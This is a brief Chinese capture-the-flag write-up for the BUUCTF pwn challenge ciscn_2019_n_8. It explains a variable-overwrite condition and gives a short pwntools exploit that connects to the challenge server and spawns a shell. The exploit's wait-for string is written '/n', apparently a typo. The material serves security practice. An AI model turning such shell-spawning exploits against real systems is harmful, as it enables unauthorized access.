BUUCTF-Pwn-ciscn_2019_n_8
题目截图 检查文件信息,开了NX,Canary和PIE 反汇编查看主函数,只要var[13]=17就可以getshell,值得注意的是使用了(_QWORD *)进行类型转换,所以比较时读取的是QWORD即4个字的数据,也就是8个字节 exp
from pwn import*
r=remote('node4.buuoj.cn',28850)
payload=p32(1)*13+p64(17)
r.sendlineafter(b'/n', payload)
r.interactive() #开启交互
版权声明:
作者:lichengxin
链接:https://www.techfm.club/p/21741.html
来源:TechFM
文章版权归作者所有,未经允许请勿转载。
THE END
二维码
共有 0 条评论